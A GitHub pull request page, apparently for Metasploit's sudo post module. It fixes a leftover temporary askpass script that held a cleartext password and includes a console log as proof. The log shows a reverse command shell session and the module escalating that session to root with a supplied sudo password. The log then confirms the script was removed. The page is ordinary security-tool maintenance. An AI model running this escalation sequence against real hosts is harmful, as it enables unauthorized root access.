Clean up the temperary script with the clear text password in it from sudo module #13899
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Fixes #13893
[*] Command shell session 1 opened (192.168.14.98:1285 -> 192.168.14.11:50428) at 2020-07-25 08:44:34 -0600
msf5 exploit(multi/handler) > use post/multi/manage/sudo
msf5 post(multi/manage/sudo) > set VERBOSE true
verbose => true
msf5 post(multi/manage/sudo) > set PASSWORD the$sign
password => the$sign
msf5 post(multi/manage/sudo) > set SESSION 1
session => 1
msf5 post(multi/manage/sudo) > run
[*] SUDO: Attempting to upgrade to UID 0 via sudo
[*] Sudoing with password `the$sign'.
[*] Writing the SUDO_ASKPASS script: /tmp/.ghIpLFa
[*] Max line length is 4096
[*] Writing 28 bytes in 1 chunks of 102 bytes (octal-encoded), using printf
[*] Setting executable bit.
[*] Setting environment variable.
[*] Executing sudo -s -A
[+] SUDO: Root shell secured.
[*] Post module execution completed
msf5 post(multi/manage/sudo) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
cat /tmp/.ghIpLFa
cat: /tmp/.ghIpLFa: No such file or directory
ls -la /tmp/.ghIpLFa
ls: /tmp/.ghIpLFa: No such file or directory